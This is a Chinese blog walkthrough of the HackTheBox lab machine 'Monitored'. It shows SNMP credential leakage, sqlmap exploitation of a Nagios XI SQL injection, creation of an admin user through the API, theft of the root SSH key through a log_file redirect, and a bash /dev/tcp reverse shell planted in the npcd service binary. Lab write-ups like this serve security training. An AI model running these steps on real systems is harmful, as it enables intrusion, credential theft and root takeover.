[Meachines][Medium]Monitored

最新推荐文章于 2024-07-19 15:37:32 发布
最新推荐文章于 2024-07-19 15:37:32 发布
阅读量939 收藏 14
点赞数 26
分类专栏: HackTheBox 文章标签: php 智能路由器 开发语言
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/138295900
版权

Main

$ nmap -p- -sC -sV 10.10.11.248 --min-rate 1000

image.png

# echo "10.10.11.248 nagios.monitored.htb" >>/etc/hosts

image.png

image.png

image.png

  • Nagios 是一个流行的开源网络监控系统,用于监控计算机系统、网络设备、服务以及应用程序。它可以实时监控主机和服务的状态,及时发现和报告问题,从而帮助管理员快速诊断和解决网络和系统方面的故障。

通过漏洞库查询到存在一个SQL注入
CVE-2023–40933

image.png

image.png

image.png

$ nmap -sU -sC -sV 10.10.11.248 --min-rate 1000

image.png

  • SNMP(Simple Network Management Protocol)是一种用于管理和监控网络设备的标准协议。它允许网络管理员远程监视网络设备的运行状态、收集性能数据、配置设备以及诊断问题。通过SNMP,管理员可以从网络设备(如路由器、交换机、服务器等)中获取信息,也可以向这些设备发送控制命令。SNMP使用一个基于文本的数据格式来交换信息,通常被用于监控和管理大型企业网络。

$ snmpwalk -v2c -c public nagios.monitored.htb
从结果中发现了了登录凭据svc XjH7VCehowpR1xZB

image.png

  • snmpbulkwalk 是一个基于命令行的工具,用于执行 SNMP(Simple Network Management Protocol)的批量查询。它通常用于获取大量的网络设备信息,比如路由器、交换机等。与标准的 snmpwalk 工具相比,snmpbulkwalk 通过在单个请求中获取多个变量来提高效率,减少了网络交互的次数,因此对于大型网络或者需要获取大量信息的情况下更加高效。snmpbulkwalk 工具允许用户指定要查询的设备、OID(Object Identifier)以及相关的认证参数,以便获取所需的网络设备信息

https://nagios.monitored.htb/nagiosxi/includes/components/ccm/index.php

image.png

https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php

image.png

页面存在

$ curl -X POST -k -L -d 'username=svc&password=XjH7VCehowpR1xZB' https://nagios.monitored.htb/nagiosxi/api/v1/authenticate/

我们可以通过这个接口来获取TOKEN

image.png

$ sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch --dbs

image.png

$ sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi --tables

image.png

$ sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ksX POST https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi -T xi_users --dump

image.png

我们将通过这个APIKEY来添加一个用户

$ curl -XPOST 'https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1' -d 'username=s-h4ck13&password=maptnh&email=maptnh@maptnh.com&name=mapth&auth_level=admin' -k
image.png

登录后台https://nagios.monitored.htb/nagiosxi/login.php
如果是真实环境在这里其实可在SQL数据库中修改管理员的邮箱,让后忘记密码,这样发送的重置密码就会到攻击者邮箱验证修改
username:s-h4ck13
password:maptnh

image.png

Configure->Core Config Manager->Commands->Add New

image.png

image.png

image.png

选择命令后,点击右下角Run Check Command

image.png

image.png

image.png

User Flag

/home/nagios$ cat user.txt

image.png

39ea0ded58be8ba1cf84a3f332e5757e

Root Flag

$ sudo -l

image.png

方法1

$ cat /usr/local/nagiosxi/scripts/components/getprofile.sh

我们将内容复制下来分析

image.png

在277行发现一个文件我们有权限进行修改

image.png

image.png

$ cat /usr/local/nagios/etc/nagios.cfg

image.png

$ vi /usr/local/nagios/etc/nagios.cfg
把log_file=/usr/local/nagios/var/nagios.log修改成log_file=/root/.ssh/id_rsa

image.png

$ sudo /usr/local/nagiosxi/scripts/components/getprofile.sh 1

image.png

[靶机]

$ cd /usr/local/nagiosxi/var/components
$ /usr/local/nagiosxi/var/components$ python -m http.server 7890

[Kali]

$ wget http://10.10.11.248:7890/profile.zip
$ unzip profile.zip
目录profile-1714316974/nagios-logs/nagios.txt已经读取到root用户的私钥
image.png

$ cd profile-1714316974/nagios-logs;mv nagios.txt id_rsa;chmod 400 id_rsa;ssh -i id_rsa root@10.10.11.248

image.png

4c45fe55bd0f2f1364c07760c92af9d8

方法2

[靶机]

$ ls /usr/local/nagiosxi/scripts/ -la

image.png

$ cd /usr/local/nagiosxi/scripts/

$ cat manage_services.sh

用于操作服务的

image.png

我们可以控制启动npcd服务来反弹一个shell

  • npcd 是 Nagios XI 中的一个守护进程(daemon),用于执行网络设备的自动发现和监控。Nagios 是一个流行的开源网络监控工具,Nagios XI 是 Nagios 的商业版本,提供了更多功能和易用性。

image.png

$ systemctl status npcd

找到服务位置

image.png

$ sudo ./manage_services.sh stop npcd

$ systemctl status npcd

image.png

$ rm /usr/local/nagios/bin/npcd

我们可以手动删除这个npcd,

image.png

我们可以看之前的权限,我们所在组是具有高权限的,可以进行删除该文件

image.png

$ vi /usr/local/nagios/bin/npcd
劫持该服务

#!/bin/bash
 bash -i >& /dev/tcp/10.10.16.23/10034 0>&1

$ chmod +x /usr/local/nagios/bin/npcd

方法2-1

$ sudo ./manage_services.sh start npcd

image.png

image.png

4c45fe55bd0f2f1364c07760c92af9d8

方法2-2

值得庆幸的是在/usr/local/nagiosxi/scripts/components/getprofile.sh调用了这个可执行文件

image.png

$ sudo /usr/local/nagiosxi/scripts/components/getprofile.sh 1

image.png

image.png

4c45fe55bd0f2f1364c07760c92af9d8

Мартин.
关注
  • 26
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Child-monitored token reading program
06-29
Child-monitored token reading program RECEPTIVE-EXPRESSIVE FUNCTIONS IN CHILDREN AND ADOLESCENTS 259 ERVIN-TRIPP, S. Language development. In Lois W. Hoffman and M. L. Hoffman (Eds.), Review of ...
monitored-server:安装在服务器上的代码
06-09
"monitored-server:安装在服务器上的代码"这个项目主要关注的是如何在服务器上部署和运行监控代码,以实现对服务器状态的实时监测。这通常涉及到使用JavaScript编程语言,因为JavaScript在服务器端,尤其是在Node.js...
brooklyn-example-monitored-cassandra-cluster-0.5.0-m2.jar
03-09
jar包,亲测可用
808 nm laser triggered self-monitored photo-thermal therapeutic nano-system Y
01-26
A multifunctional photo-thermal therapeutic nano-platform
AI-monitored-and-enhanced-online-classroom-and-examination
05-10
五角大楼利用DataStax Astra数据库技术,随时可以部署全栈AI监视和增强的在线教室和考试门户项目演示运行应用程序的说明: 1. Create a python 3.7 virtual environment and proceeed with installation there: 2....
全新UI自助图文打印系统小程序源码/自助云打印机前后端源码
12年全栈程序开发
07-17 211
这些服务覆盖了多种文件格式,包括文档、图片、表格等。除此之外,系统还集成了额外的特色功能,如美颜、换装以及文档打印等,以满足用户的不同需求。管理员可进管理后台对打印机进行管理。最新的自助图文打印系统和证件照云打印小程序源码采用了PHP作为后端开发语言,旨在为用户提供全面的自助打印服务。
小欧吃苹果-OPPO 2024届校招正式批笔试题-数据开发(C卷)
sigd的博客
07-16 498
小欧吃苹果,拓扑排序处理贪心问题。
释放Laravel Blade的威力:掌握Laravel的模板引擎
2401_85812026的博客
07-16 1288
Blade是Laravel的内置模板引擎,它让你的前端代码更加简洁、易读。Blade视图文件通常以.blade.php为扩展名,支持直接在视图文件中使用PHP代码。
PHP基础语法
红客网络编程与渗透技术
07-15 257
下面,我们提供了一个简单的 PHP 文件实例,它可以向浏览器输出文本 "Hello World!PHP 中的每个代码行都必须以分号结束。分号是一种分隔符,用于把指令集区分开来。通过 PHP,有两种在浏览器输出文本的基础指令:echo 和 print。PHP 脚本在服务器上执行,然后将纯 HTML 结果发送回浏览器。PHP 文件通常包含 HTML 标签和一些 PHP 脚本代码。PHP 脚本以
php 实现栈
huanghm88的专栏
07-16 342
可以根据需要使用这些方法来操作栈。类,其中包含了入栈()和判断栈是否为空(
PHP小课堂】学习PHP中的字符串操作函数(三)
硬核项目经理
07-15 783
学习PHP中的字符串操作函数(三)继续我们的 PHP 中字符串函数的学习之旅。今天我们要学习的内容是除了 str_ 和 str 开头之外的其它函数,这些函数也有很多非常好玩的内容,让我们赶快进入主题吧。分隔、打断字符串关于这个分割字符串并成为数组,或者是反过来的将数组组合成字符串的功能来说,implode() 和 explode() 这两个函数真的是出镜率非常的高。所以它们的使用也不用我多做介绍了...
ns3-gym入门(三):在opengym基础上实现一个小小的demo
zoe2222226666的博客
07-15 429
因为官方给的"opengym""opengym-2"这两个例子都很简单,所以自己改了一个demo,把reward-action-state相互影响的关系表现出来
如何轻松将Squarespace网站迁移到WordPress
web_geek的博客
07-18 856
但是它也有一些缺点,Squarespace是一个封闭系统的CMS,对于初学者来说它是一个非常不错的一体化建站方案,但是随着网站的发展,用户的选择也会随之受限,例如,无法选择服务器提供商,也无法使用一些第三方的工具,相对于WordPress这种开源程序来说,局限性比较大,当您有了一定的网站运营基础或者想要更加自由的对网站添加自己的设计元素的时候,WordPress就会成为更好的选择。但是,正如开头所说,会有部分内容无法直接转移过来,例如,你可能会在之前有音频或产品模块的位置看到空白或错误信息。
如何在Java、Python、PHP中使用短信通知API?
最新发布
Mtxxd的博客
07-19 604
短信通知API是一种用于发送及时通知信息的工具,通过稳定的短信通道,实现开发者向用户传递重要信息的目的。其特点包括即时性、可靠性、定制性等,适用于各行业的订单通知、账户提醒、活动通告等场景。使用时需注意合法性验证、隐私保护、短信内容定制等方面,以提供安全、合规、高效的通知服务,提升用户体验。
thinkphp:数据库多条件查询
weixin_46001736的博客
07-15 155
thinkphp:数据库多条件查询
某4G区域终端有时驻留弱信号小区分析
dreamfly130的博客
07-19 565
而1650频点虽然下发band1 100的测量参数,但是又一直不理终端发给网络的band1 100的测量报告。12:12:38.307003 网络下发针对1650的A4测量配置(-106db即可满足),终端从band1 100(-93db),上报band3 1650的A4测量报告,切到弱信号band3 1650(-104db)。12:12:38.307003 网络下发针对1650的A4测量配置,终端从band1 100,上报band3 1650的A4测量报告,切到band3 1650。用于基于负荷的切换。
ctfshow-web入门-php特性(web127-web131)
Welcome To Myon'Blog !
07-17 634
将 $flag 变量进行 MD5 哈希运算,并将结果赋值给 $ctf_show。获取当前请求的查询字符串(query string),查询字符串是 URL 中位于问号 (?) 之后的部分,通常包含一个或多个参数和值。之后对查询字符串采用正则匹配过滤掉了一些符号,符合要求则会将 $_GET 数组中的键值对作为变量导入到当前的符号表中。换句话说,extract($_GET);会将 URL 查询参数中的每个键值对转换成同名的变量。最后要求 $ctf_show==='ilove36d' 就会输出 flag。
linux 安装使用php环境, 以及常用操作介绍
wyg1995的博客
07-16 190
php的源码编译安装,属实是太麻烦太痛苦了;于是我们选择放弃这种方式,采用linux自带的包管理器来安装。
[网鼎杯 2018]Fakebook
pwfortune的博客
07-16 380
里面的参数是一个完整的路径,于是我们直接用var/www/html/flag.php路径去访问一下这个文件就可以拿的到flag。union select 不行, 但是单独的union 和 select 可以, 可能是不能连一起 , 中间用 /**/前面可以知道是data字段存放着序列化的字符串 , 所以将自己构造的序列化字符串放在第四个位置注入进去。源码里面可以找到一串特性的字符串, 点击一下, 就会跳转到相应的界面得到flag。很明显的反序列化的内容 , 之前注册账号的内容。单独看 data 的数据。
the monitored command dumped core segmentation fault
12-27
这个错误信息意味着被监控的命令出现了核心转储,即发生了分段错误。在计算机科学中,分段错误通常是由于程序访问了不属于自己的内存位置而导致的。这可能是由于编程错误、内存泄漏或内存损坏等原因引起的。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值